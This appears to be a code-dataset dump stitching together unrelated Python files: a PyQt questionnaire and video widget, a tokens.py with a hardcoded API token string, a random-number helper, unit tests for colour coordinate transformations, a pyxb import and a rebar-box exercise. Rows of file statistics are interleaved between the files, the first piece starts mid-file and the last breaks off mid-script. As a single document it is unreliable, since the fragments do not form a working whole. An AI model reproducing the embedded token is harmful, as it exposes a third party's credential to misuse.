4: QtCore.Qt.Key_4, 5: QtCore.Qt.Key_5, 6: QtCore.Qt.Key_6, 7: QtCore.Qt.Key_7,
8: QtCore.Qt.Key_8, 9: QtCore.Qt.Key_9})
def __init__(self, next_action=None, finish_action=None, previous_action=None, back_action=None, answer_action=None,
**kwargs):
super().__init__(**kwargs)
if next_action is None:
self.next_action = self.default_next
else:
self.next_action = next_action
if finish_action is None:
self.finish_action = self.default_finish
else:
self.finish_action = finish_action
if previous_action is None:
self.previous_action = self.default_previous
else:
self.previous_action = previous_action
if back_action is None:
self.back_action = self.default_back
else:
self.back_action = back_action
if answer_action is None:
self.answer_action = self.default_answer
else:
self.answer_action = answer_action
self.ui = Ui_EmotionQuestionnaireImage()
self.ui.setupUi(self)
self.ui.continueButton.clicked.connect(self._continue)
self.ui.backButton.clicked.connect(self.previous)
self.continueAction = QAction("Continue", self)
self.continueAction.setShortcut(QKeySequence("Shift+Return"))
self.continueAction.triggered.connect(self._continue)
self.addAction(self.continueAction)
self._path = None
self.text = None
self.qa = []
self.answers = []
self.answer_key = bidict()
self.q_index = 0
self.multi_answers = 1
self.current_question = None
self.current_answers = None
self.current_color = None
self.selected_answer = ""
@property
def path(self):
return self._path
@path.setter
def path(self, value):
if isinstance(value, pathlib.Path) or value is None:
self._path = value
else:
self._path = pathlib.Path(value)
def load_file(self, file):
if file is not None:
self.path = file
if self.path.as_posix() != '.':
q_file = toml.load(self.path)
self.qa = q_file['Questions']
self.q_index = 0
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
if 'image' in qa:
self.set_image(pathlib.Path(qa['image']))
def set_image(self, file):
if file is not None:
pixmap = QtGui.QPixmap(file.as_posix())
repixmap = pixmap.scaledToHeight(480)
self.ui.image.setPixmap(repixmap)
self.current_image = file
def set_color(self, color):
if color is not None:
self.ui.colorSpacer.setStyleSheet('background-color:rgb(' + color + ')')
self.current_color = color
def set_question(self, question):
self.ui.questionBrowser.setText(question)
self.current_question = question
def set_answers(self, answers, _format=None):
self.remove_answers()
self.current_answers = answers
if _format == 'scale':
size = (1, len(answers))
else:
size = (2, -(-len(answers) // 2))
b_size = (size[0] + 2, size[1] + 2)
topSpacer = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
bottomSpacer = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
leftSpacer = QtWidgets.QSpacerItem(5, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
rightSpacer = QtWidgets.QSpacerItem(5, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.ui.answersLayout.addItem(topSpacer, 0, 0, 1, b_size[1])
self.ui.answersLayout.addItem(bottomSpacer, b_size[1], 0, 1, b_size[1])
self.ui.answersLayout.addItem(leftSpacer, 1, 0, size[1], 1)
self.ui.answersLayout.addItem(rightSpacer, 1, size[1] + 1, size[1], 1)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
font = QtGui.QFont()
font.setPointSize(18)
self.ui.answerChecks = []
for i in range(0, size[0]):
for j in range(0, size[1]):
a_index = i * size[1] + j
if a_index < len(answers):
answer_check = QtWidgets.QCheckBox(self.ui.answersBox)
sizePolicy.setHeightForWidth(answer_check.sizePolicy().hasHeightForWidth())
answer_check.setSizePolicy(sizePolicy)
answer_check.setFont(font)
answer_check.setObjectName('answer_check_' + str(a_index))
answer_check.setText(
QtWidgets.QApplication.translate("EmotionQuestionnaire", answers[a_index], None, -1))
answer_check.clicked.connect(self.generate_answer_function(answer_check))
self.ui.answerChecks.append(answer_check)
self.ui.answersLayout.addWidget(answer_check, i + 1, j + 1, 1, 1)
self.answer_key[answers[a_index]] = answer_check
def remove_answers(self):
self.answer_key.clear()
while not self.ui.answersLayout.isEmpty():
item = self.ui.answersLayout.takeAt(0)
if not item.isEmpty():
widget = item.widget()
widget.deleteLater()
del widget
self.ui.answersLayout.removeItem(item)
def generate_answer_function(self, answer_check):
return lambda v: self.answer_toggle(answer_check, v)
def answer_toggle(self, answer_check, value):
self.answer(answer_check, value)
if self.multi_answers > 0:
self.limit_answer(self.multi_answers, answer_check)
def answer(self, check_widget, value):
answer = self.answer_key.inverse[check_widget]
if answer is None:
answer = ""
self.selected_answer = answer
event = {'type_': 'Questionnaire_AnswerSelected', 'File': self.path.name,
'Question': self.current_question, 'Answer': answer, 'Value': value}
self.answer_action(event=event, caller=self)
def limit_answer(self, limit, last):
available = limit
other_answers = self.answer_key.copy()
other_answers.inverse.pop(last)
for answer in other_answers.values():
if answer.isChecked():
if available > 1:
available -= 1
else:
answer.setChecked(False)
def default_answer(self, event=None, caller=None):
pass
def keyPressEvent(self, event):
key = event.key()
if key in self.number_key.inverse:
number = self.number_key.inverse[key]
if number < len(self.current_answers):
check_widget = self.answer_key[self.current_answers[number]]
check_widget.setChecked(True)
self.answer_toggle(check_widget, True)
elif key == QtCore.Qt.Key_Enter or key == QtCore.Qt.Key_Return:
self._continue()
elif key == QtCore.Qt.Key_Backspace:
self.previous()
event.accept()
def _continue(self):
self.q_index += 1
event = {'type_': 'Questionnaire_AnswerConfirmed', 'File': self.path.name,
'Question': self.current_question, 'Answer': self.selected_answer}
if self.q_index < len(self.qa):
self.next_action(event=event, caller=self)
else:
self.finish_action(event=event, caller=self)
def default_next(self, event=None, caller=None):
if self.q_index < len(self.qa) - 1:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
else:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Done", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
if 'image' in qa:
self.set_image(pathlib.Path(qa['image']))
def default_finish(self, event=None, caller=None):
print("Not Connected")
def previous(self):
if self.q_index > 0:
self.q_index -= 1
event = {'type_': 'Questionnaire_AnswerRetracted', 'File': self.path.name,
'Question': self.qa[self.q_index]['question']}
self.previous_action(event=event, caller=self)
else:
event = {'type_': 'Questionnaire_Exited', 'File': self.path.name}
self.back_action(event=event, caller=self)
def default_previous(self, event=None, caller=None):
if self.q_index > 0:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
else:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Exit", None, -1))
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
if 'image' in qa:
self.set_image(pathlib.Path(qa['image']))
def default_back(self, event=None, caller=None):
print('There is no going back')
class FinishWidget(QWidget):
def __init__(self):
super().__init__()
self._path = None
self.run_action = self.default_run
self.ui = Ui_EmotionFinish()
self.ui.setupUi(self)
self.text = None
@property
def path(self):
return self._path
@path.setter
def path(self, value):
if isinstance(value, pathlib.Path) or value is None:
self._path = value
else:
self._path = pathlib.Path(value)
def load_file(self, file):
if file is not None:
self.path = file
pixmap = QtGui.QPixmap(self.path.as_posix())
self.ui.imageSpace.setPixmap(pixmap)
def start(self):
event = {'type_': 'Finished'}
self.run_action(event=event, caller=self)
def default_run(self, event=None, caller=None):
print('finish')
class VideoPlayerWidget(QWidget):
def __init__(self, frame_action=None, finish_action=None, **kwargs):
super(VideoPlayerWidget, self).__init__(**kwargs)
if frame_action is None:
self.frame_action = self.default_frame
else:
self.frame_action = frame_action
if finish_action is None:
self.finish_action = self.default_finish
else:
self.finish_action = finish_action
self.ui = Ui_EmotionVideoPlayer()
self.ui.setupUi(self)
self.backgroundPalette = QtGui.QPalette()
self.backgroundPalette.setColor(QtGui.QPalette.Background, QtGui.QColor(0, 0, 0))
self.setAutoFillBackground(True)
self.setPalette(self.backgroundPalette)
self.ui.videoPlayer = QtMultimediaWidgets.QVideoWidget()
self.ui.gridLayout.addWidget(self.ui.videoPlayer, 1, 1, 1, 1)
self.mediaPlayer = QtMultimedia.QMediaPlayer(self, QtMultimedia.QMediaPlayer.VideoSurface)
self.video_item = QtMultimediaWidgets.QGraphicsVideoItem()
self.mediaPlayer.setVideoOutput(self.ui.videoPlayer)
self.mediaPlayer.mediaStatusChanged.connect(self.status_check)
self.frameProbe = QtMultimedia.QVideoProbe(self)
# self.frameProbe.videoFrameProbed.connect(self.frame)
self.frameProbe.setSource(self.mediaPlayer)
self.frame_number = 0
self.video = None
def set_video(self, video):
self.video = video
if isinstance(video, pathlib.Path) or isinstance(video, str):
video = QtCore.QUrl.fromLocalFile(str(video))
if isinstance(video, QtCore.QUrl):
video = QtMultimedia.QMediaContent(video)
self.mediaPlayer.setMedia(video)
self.frame_number = 0
def play(self):
self.mediaPlayer.play()
def frame(self, frame):
self.frame_number += 1
event = {'type_': 'Video_Frame', 'Video': self.video.name, 'FrameNumber': self.frame_number}
self.frame_action(frame, self.frame_number, event=event, caller=self)
def default_frame(self, frame=None, number=None, event=None, caller=None):
print(QtCore.QTime.currentTime().toString("hh:mm:ss.zzzz"))
def status_check(self, status):
if status == QtMultimedia.QMediaPlayer.EndOfMedia:
self.finish()
def finish(self):
self.mediaPlayer.stop()
self.mediaPlayer.setMedia(self.mediaPlayer.media())
event = {'type_': 'Video_Finished', 'Video': self.video.as_posix()}
self.finish_action(event=event, caller=self)
def default_finish(self, event=None, caller=None):
print("Done!")
| 39.228045 | 120 | 0.628417 | 3,178 | 27,695 | 5.314349 | 0.093455 | 0.025224 | 0.016934 | 0.039434 | 0.770205 | 0.755995 | 0.743146 | 0.731719 | 0.73012 | 0.720232 | 0 | 0.010624 | 0.259072 | 27,695 | 705 | 121 | 39.283688 | 0.812427 | 0.00733 | 0 | 0.758974 | 0 | 0 | 0.056203 | 0.00779 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117949 | false | 0.003419 | 0.025641 | 0.008547 | 0.167521 | 0.015385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6bec6dace899a4325650b34f647fce83936172d | 50 | py | Python | bot/tokens.py | mukoedo1993/webster_python_bot | 73cf76f368bf4705c2c61df967039b3ce66c3928 | [
"MIT"
] | null | null | null | bot/tokens.py | mukoedo1993/webster_python_bot | 73cf76f368bf4705c2c61df967039b3ce66c3928 | [
"MIT"
] | null | null | null | bot/tokens.py | mukoedo1993/webster_python_bot | 73cf76f368bf4705c2c61df967039b3ce66c3928 | [
"MIT"
] | null | null | null | cmc_token = 'abf9d4f1-8beb-4fa4-925c-a8910fb521e6' | 50 | 50 | 0.82 | 7 | 50 | 5.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.354167 | 0.04 | 50 | 1 | 50 | 50 | 0.479167 | 0 | 0 | 0 | 0 | 0 | 0.705882 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6c0ed3417e88ca505902480f0e2a58a76af5029 | 151 | py | Python | file_duplicator/common/generator/number_generator.py | alexeby/VidlyAPINode | 5f88ac1544b6687936c0acacb52a9c65f1be0237 | [
"Info-ZIP"
] | null | null | null | file_duplicator/common/generator/number_generator.py | alexeby/VidlyAPINode | 5f88ac1544b6687936c0acacb52a9c65f1be0237 | [
"Info-ZIP"
] | null | null | null | file_duplicator/common/generator/number_generator.py | alexeby/VidlyAPINode | 5f88ac1544b6687936c0acacb52a9c65f1be0237 | [
"Info-ZIP"
] | null | null | null | import random
def get_random_num_range(x: int, y: int):
return random.randint(x, y)
def get_random_num():
return int(random.random()*10)
| 12.583333 | 41 | 0.688742 | 25 | 151 | 3.96 | 0.48 | 0.121212 | 0.242424 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01626 | 0.18543 | 151 | 11 | 42 | 13.727273 | 0.788618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
e6c15b1c3eab39c19a3725d207497577905da0bd | 12,953 | py | Python | colour/algebra/coordinates/tests/test_transformations.py | tjdcs/colour | 09413da71b5da57408eb812797c5db1300d4791a | [
"BSD-3-Clause"
] | null | null | null | colour/algebra/coordinates/tests/test_transformations.py | tjdcs/colour | 09413da71b5da57408eb812797c5db1300d4791a | [
"BSD-3-Clause"
] | null | null | null | colour/algebra/coordinates/tests/test_transformations.py | tjdcs/colour | 09413da71b5da57408eb812797c5db1300d4791a | [
"BSD-3-Clause"
] | null | null | null | """
Define the unit tests for the
:mod:`colour.algebra.coordinates.transformations` module.
"""
import numpy as np
import unittest
from itertools import product
from colour.algebra import (
cartesian_to_spherical,
spherical_to_cartesian,
cartesian_to_polar,
polar_to_cartesian,
cartesian_to_cylindrical,
cylindrical_to_cartesian,
)
from colour.utilities import ignore_numpy_errors
__author__ = "Colour Developers"
__copyright__ = "Copyright 2013 Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"TestCartesianToSpherical",
"TestSphericalToCartesian",
"TestCartesianToPolar",
"TestPolarToCartesian",
"TestCartesianToCylindrical",
"TestCylindricalToCartesian",
]
class TestCartesianToSpherical(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
cartesian_to_spherical` definition unit tests methods.
"""
def test_cartesian_to_spherical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_spherical` definition.
"""
np.testing.assert_almost_equal(
cartesian_to_spherical(np.array([3, 1, 6])),
np.array([6.78232998, 0.48504979, 0.32175055]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_spherical(np.array([-1, 9, 16])),
np.array([18.38477631, 0.51501513, 1.68145355]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_spherical(np.array([6.3434, -0.9345, 18.5675])),
np.array([19.64342307, 0.33250603, -0.14626640]),
decimal=7,
)
def test_n_dimensional_cartesian_to_spherical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_spherical` definition n-dimensional arrays support.
"""
a_i = np.array([3, 1, 6])
a_o = cartesian_to_spherical(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(
cartesian_to_spherical(a_i), a_o, decimal=7
)
a_i = np.reshape(a_i, (2, 3, 3))
a_o = np.reshape(a_o, (2, 3, 3))
np.testing.assert_almost_equal(
cartesian_to_spherical(a_i), a_o, decimal=7
)
@ignore_numpy_errors
def test_nan_cartesian_to_spherical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_spherical` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=3))))
cartesian_to_spherical(cases)
class TestSphericalToCartesian(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
spherical_to_cartesian` definition unit tests methods.
"""
def test_spherical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
spherical_to_cartesian` definition.
"""
np.testing.assert_almost_equal(
spherical_to_cartesian(
np.array([6.78232998, 0.48504979, 0.32175055])
),
np.array([3.00000000, 0.99999999, 6.00000000]),
decimal=7,
)
np.testing.assert_almost_equal(
spherical_to_cartesian(
np.array([18.38477631, 0.51501513, 1.68145355])
),
np.array([-1.00000003, 9.00000007, 15.99999996]),
decimal=7,
)
np.testing.assert_almost_equal(
spherical_to_cartesian(
np.array([19.64342307, 0.33250603, -0.14626640])
),
np.array([6.34339996, -0.93449999, 18.56750001]),
decimal=7,
)
def test_n_dimensional_spherical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
spherical_to_cartesian` definition n-dimensional arrays support.
"""
a_i = np.array([6.78232998, 0.48504979, 0.32175055])
a_o = spherical_to_cartesian(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(
spherical_to_cartesian(a_i), a_o, decimal=7
)
a_i = np.reshape(a_i, (2, 3, 3))
a_o = np.reshape(a_o, (2, 3, 3))
np.testing.assert_almost_equal(
spherical_to_cartesian(a_i), a_o, decimal=7
)
@ignore_numpy_errors
def test_nan_spherical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
spherical_to_cartesian` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=3))))
spherical_to_cartesian(cases)
class TestCartesianToPolar(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
cartesian_to_polar` definition unit tests methods.
"""
def test_cartesian_to_polar(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_polar` definition.
"""
np.testing.assert_almost_equal(
cartesian_to_polar(np.array([3, 1])),
np.array([3.16227766, 0.32175055]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_polar(np.array([-1, 9])),
np.array([9.05538514, 1.68145355]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_polar(np.array([6.3434, -0.9345])),
np.array([6.41186508, -0.14626640]),
decimal=7,
)
def test_n_dimensional_cartesian_to_polar(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_polar` definition n-dimensional arrays support.
"""
a_i = np.array([3, 1])
a_o = cartesian_to_polar(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(cartesian_to_polar(a_i), a_o, decimal=7)
a_i = np.reshape(a_i, (2, 3, 2))
a_o = np.reshape(a_o, (2, 3, 2))
np.testing.assert_almost_equal(cartesian_to_polar(a_i), a_o, decimal=7)
@ignore_numpy_errors
def test_nan_cartesian_to_polar(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_polar` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=2))))
cartesian_to_polar(cases)
class TestPolarToCartesian(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
polar_to_cartesian` definition unit tests methods.
"""
def test_polar_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
polar_to_cartesian` definition.
"""
np.testing.assert_almost_equal(
polar_to_cartesian(np.array([0.32175055, 1.08574654])),
np.array([0.15001697, 0.28463718]),
decimal=7,
)
np.testing.assert_almost_equal(
polar_to_cartesian(np.array([1.68145355, 1.05578119])),
np.array([0.82819662, 1.46334425]),
decimal=7,
)
np.testing.assert_almost_equal(
polar_to_cartesian(np.array([-0.14626640, 1.23829030])),
np.array([-0.04774323, -0.13825500]),
decimal=7,
)
def test_n_dimensional_polar_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
polar_to_cartesian` definition n-dimensional arrays support.
"""
a_i = np.array([3.16227766, 0.32175055])
a_o = polar_to_cartesian(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(polar_to_cartesian(a_i), a_o, decimal=7)
a_i = np.reshape(a_i, (2, 3, 2))
a_o = np.reshape(a_o, (2, 3, 2))
np.testing.assert_almost_equal(polar_to_cartesian(a_i), a_o, decimal=7)
@ignore_numpy_errors
def test_nan_polar_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
polar_to_cartesian` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=2))))
polar_to_cartesian(cases)
class TestCartesianToCylindrical(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
cartesian_to_cylindrical` definition unit tests methods.
"""
def test_cartesian_to_cylindrical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_cylindrical` definition.
"""
np.testing.assert_almost_equal(
cartesian_to_cylindrical(np.array([3, 1, 6])),
np.array([3.16227766, 0.32175055, 6.00000000]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_cylindrical(np.array([-1, 9, 16])),
np.array([9.05538514, 1.68145355, 16.00000000]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_cylindrical(np.array([6.3434, -0.9345, 18.5675])),
np.array([6.41186508, -0.14626640, 18.56750000]),
decimal=7,
)
def test_n_dimensional_cartesian_to_cylindrical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_cylindrical` definition n-dimensional arrays support.
"""
a_i = np.array([3, 1, 6])
a_o = cartesian_to_cylindrical(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(
cartesian_to_cylindrical(a_i), a_o, decimal=7
)
a_i = np.reshape(a_i, (2, 3, 3))
a_o = np.reshape(a_o, (2, 3, 3))
np.testing.assert_almost_equal(
cartesian_to_cylindrical(a_i), a_o, decimal=7
)
@ignore_numpy_errors
def test_nan_cartesian_to_cylindrical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_cylindrical` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=3))))
cartesian_to_cylindrical(cases)
class TestCylindricalToCartesian(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
cylindrical_to_cartesian` definition unit tests methods.
"""
def test_cylindrical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cylindrical_to_cartesian` definition.
"""
np.testing.assert_almost_equal(
cylindrical_to_cartesian(
np.array([0.32175055, 1.08574654, 6.78232998])
),
np.array([0.15001697, 0.28463718, 6.78232998]),
decimal=7,
)
np.testing.assert_almost_equal(
cylindrical_to_cartesian(
np.array([1.68145355, 1.05578119, 18.38477631])
),
np.array([0.82819662, 1.46334425, 18.38477631]),
decimal=7,
)
np.testing.assert_almost_equal(
cylindrical_to_cartesian(
np.array([-0.14626640, 1.23829030, 19.64342307])
),
np.array([-0.04774323, -0.13825500, 19.64342307]),
decimal=7,
)
def test_n_dimensional_cylindrical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cylindrical_to_cartesian` definition n-dimensional arrays support.
"""
a_i = np.array([3.16227766, 0.32175055, 6.00000000])
a_o = cylindrical_to_cartesian(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(
cylindrical_to_cartesian(a_i), a_o, decimal=7
)
a_i = np.reshape(a_i, (2, 3, 3))
a_o = np.reshape(a_o, (2, 3, 3))
np.testing.assert_almost_equal(
cylindrical_to_cartesian(a_i), a_o, decimal=7
)
@ignore_numpy_errors
def test_nan_cylindrical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cylindrical_to_cartesian` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=3))))
cylindrical_to_cartesian(cases)
if __name__ == "__main__":
unittest.main()
| 30.767221 | 79 | 0.617463 | 1,601 | 12,953 | 4.73579 | 0.079325 | 0.044315 | 0.059351 | 0.083092 | 0.849776 | 0.849776 | 0.798866 | 0.796096 | 0.723688 | 0.686494 | 0 | 0.097219 | 0.255925 | 12,953 | 420 | 80 | 30.840476 | 0.689458 | 0.20281 | 0 | 0.46281 | 0 | 0 | 0.032972 | 0.013926 | 0 | 0 | 0 | 0 | 0.123967 | 1 | 0.07438 | false | 0 | 0.020661 | 0 | 0.119835 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6e7814d9ad37a6e28c1c5d827a2c06c4e67e116 | 45 | py | Python | dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/wsoap.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 123 | 2015-01-12T06:43:22.000Z | 2022-03-20T18:06:46.000Z | dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/wsoap.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 103 | 2015-01-08T18:35:57.000Z | 2022-01-18T01:44:14.000Z | dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/wsoap.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 54 | 2015-02-15T17:12:00.000Z | 2022-03-07T23:02:32.000Z | from pyxb.bundles.wssplat.raw.wsoap import *
| 22.5 | 44 | 0.8 | 7 | 45 | 5.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e6fa3475d775bfaed603460c90023aed6699c1eb | 1,182 | py | Python | exercicios_fixacao/lista04/repet_lim_ex5.py | PauloVictorSS/unicamp-mc102 | 077ca3ea6d3df40ebe205c2e874d20a934ea5541 | [
"MIT"
] | null | null | null | exercicios_fixacao/lista04/repet_lim_ex5.py | PauloVictorSS/unicamp-mc102 | 077ca3ea6d3df40ebe205c2e874d20a934ea5541 | [
"MIT"
] | null | null | null | exercicios_fixacao/lista04/repet_lim_ex5.py | PauloVictorSS/unicamp-mc102 | 077ca3ea6d3df40ebe205c2e874d20a934ea5541 | [
"MIT"
] | null | null | null | rebar_size = int(input("Enter the rebar size: "))
max_volume = int(input("Enter the maximum box volume: "))
total_possibilities = []
max_edge = rebar_size//4
x = 0
y = 0
z = 0
for x in range(1, max_edge):
possibilitie = []
if (x + y + z) == (max_edge):
if ((x * y * z) <= max_volume):
possibilitie.append(x)
possibilitie.append(y)
possibilitie.append(z)
total_possibilities.append(possibilitie)
for y in range(1, max_edge):
possibilitie = []
if (x + y + z) == (max_edge):
if ((x * y * z) <= max_volume):
possibilitie.append(x)
possibilitie.append(y)
possibilitie.append(z)
total_possibilities.append(possibilitie)
for z in range(1, max_edge):
possibilitie = []
if (x + y + z) == (max_edge):
if ((x * y * z) <= max_volume):
possibilitie.append(x)
possibilitie.append(y)
possibilitie.append(z)
total_possibilities.append(possibilitie)
print(total_possibilities) | 26.266667 | 63 | 0.525381 | 136 | 1,182 | 4.433824 | 0.227941 | 0.268657 | 0.039801 | 0.049751 | 0.792703 | 0.736318 | 0.736318 | 0.736318 | 0.736318 | 0.736318 | 0 | 0.009223 | 0.357868 | 1,182 | 45 | 64 | 26.266667 | 0.785244 | 0 | 0 | 0.65625 | 0 | 0 | 0.059172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.03125 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
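# Hedged alternative sketch (not part of the exercise above): the same brute-force
# search over box edges can be expressed with itertools.product; the input values
# below are illustrative only.
from itertools import product

rebar_size = 40  # example rebar size
max_volume = 50  # example maximum box volume
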